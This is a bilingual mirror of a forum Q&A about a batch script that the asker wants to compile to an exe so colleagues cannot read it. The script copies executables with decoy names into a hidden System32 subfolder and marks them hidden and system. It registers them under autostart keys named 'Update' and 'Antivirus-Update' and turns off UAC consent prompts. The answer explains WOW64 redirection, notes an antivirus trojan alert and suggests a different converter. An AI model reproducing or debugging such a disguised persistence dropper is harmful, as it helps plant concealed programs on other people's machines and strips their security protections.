具有批处理文件的烦恼 [英] Having troubles with batch files
问题描述
此问题是吃了我的大脑。我有一个简单的批处理文件,这使得一个目录%SYSTEMROOT%
只有当它不存在&功放;拷贝某些文件到该目录,添加属性 + S + R + H
对他们来说,增加了两个程序通过注册表启动和禁用UAC,因为我需要它常常像3X天。它的工作原理以及一个批处理文件,但我想它分发给我的同胞队友公司。我们都正在这一场比赛,所以我也不需要他们看到我的code;我知道,如果我仍然在批量脚本的水平比我的code是不值得复制,但我的队友们也不会亮的灯泡!
This issue is eating my brains of. I have a simple batch file which makes a directory in %SYSTEMROOT%
only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H
to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!
我的问题是,当我把它转换使用到exe 快速批量转换器
作为瞬间就变成它开始给一个exe 拒绝访问误差
只有当它到达文件%SYSTEMROOT%复制即使我运行它以管理员身份和禁用UAC命令,这是<$ C
$ C> C:\\ WINDOWS \\ SYSTEM32 \\ CMD.EXE / K%WINDIR%\\ SYSTEM32 \\ REG.EXE ADD HKLM \\ SOFTWARE \\微软\\的Windows \\ CurrentVersion \\政策\\ SYSTEM / v ConsentPromptBehaviorAdmin /吨REG_DWORD /天0 /˚F的作品,其中,原本应该需要管理员权限。当转换成EXE其唯一的的,让访问文件复制拒绝。他们都只是正常工作,如果它是在batch.I的形式知道这可能是题外话,但我怀疑的批处理文件犯规动作,而不是快速批量转换
因为我已经转换使用该转换多个文件的他们的工作完美无瑕。
My issue is that when I convert it to exe using Quick Batch Convertor
as the moment it becomes an exe it starts giving Access denied error
only when It gets to copy the files in %SYSTEMROOT%
even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter
because I have converted many files using this converter an they worked flawless.
在code为我批是在这里
The code for my batch is here
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
有什么建议?
推荐答案
这答案不能解决你的问题。它的目标用户中的编译的脚本奇怪的异常行为的解释。
描述的问题不解决的这个32位快速批处理文件编译器。为了证明这一点,创建一个批处理脚本 battoexeTest.bat
包含
This answer does not resolve your problem; it's intended for explanation of strangely unusual behaviour of compiled script.
Described issue is not solvable with this 32-bit Quick Batch File Compiler. For proof, create a batch script battoexeTest.bat
containing
@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause
输出(高架;请注意,我已经重定向用户的%TEMP%
和%TMP%
变量):
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat"
ExecutablePath=C:\Windows\System32\cmd.exe
如果你运行上面的脚本的编译版本 batToExeTestY.exe
升高,输出会改变如下:
If you run compiled version of above script batToExeTestY.exe
elevated, output would change as follows:
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe
您可以看到,
-
batToExeTestY.exe
创建原始批处理脚本,在临时目录中的某些随机名称8YQTO48H.bat
副本帐户系统
,见的CommandLine
; - 运行在
32位
命令行的批处理文件,请参阅ExecutablePath
。 - 因此,32位数证实。
batToExeTestY.exe
creates a copy of original batch script with some random name8YQTO48H.bat
in temporary directory of accountSYSTEM
, seeCommandLine
;- runs that batch file in
32bit
command line, seeExecutablePath
. - hence, 32-bitness proved.
在MSDN文章的章= https://msdn.microsoft.com/en-us/library/aa384249(v=vs.85).aspx相对=nofollow>运行32位应用程序的:
Read File System Redirector chapter in MSDN article Running 32-bit Applications:
的%WINDIR%\\ SYSTEM32
目录保留用于64位应用程序。
...在大多数情况下,每当一个32位应用程序尝试访问
%WINDIR%\\ SYSTEM32
,访问被重定向到%WINDIR%\\ Syswow64资料
...
The
%windir%\System32
directory is reserved for 64-bit applications. … In most cases, whenever a 32-bit application attempts to access%windir%\System32
, the access is redirected to%windir%\SysWOW64
…
例如:运行 ATTRIB
下的 64位的命令行提示符的( C:\\ WINDOWS \\ SYSTEM32 \\键入cmd。 exe文件
)不管升高与否:
Example: run attrib
under 64-bit command line prompt (C:\Windows\system32\cmd.exe
) regardless of elevated or not:
==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A R C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A SHR C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt
如果您运行 ATTRIB
或 DIR
下的 32位的命令行提示符的,那么WOW重定向
If you run attrib
or dir
under 32-bit command line prompt, then WOW redirector
- 显示
C:\\ WINDOWS \\ SYSTEM32 \\ SystemSettingsUpdate
文件目录虽然 - 显示位于
%SYSTEMROOT%文件\\ SYSWOW64 \\ SystemSettingsUpdate
之一。
- displays
C:\Windows\system32\SystemSettingsUpdate
file directory although - shows files located in
%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate
one.
请看下图:
==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A R C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016 12:25 <DIR> .
01.03.2016 12:25 <DIR> ..
01.03.2015 12:31 5 120 WOW-cliParser.exe
26.02.2016 08:54 84 WOW-HL~Realtime~Defense.txt
此外,试图运行批处理脚本(稍微适应用于测试目的,然后编译)升高,但 AVG互联网安全旗舰版的在抱怨它的居民盾的:
"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"
和复制%〜dp0XYZ.exe%SYSTEMROOT%\\ SYSTEM32 \\ SystemSettingsUpdate
行和/或 ATTRIB
在其行的身份保护的模块:
and on copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
line and/or on attrib
lines in its Identity Protection module:
"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""
可能是假阳性,但你绝对需要使用一些无病毒和 64位兼容蝙蝠到exe转换器...
Could be a false positive, but you definitely need to use some virus-free and 64-bit-compliant bat to exe converter…
这篇关于具有批处理文件的烦恼的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!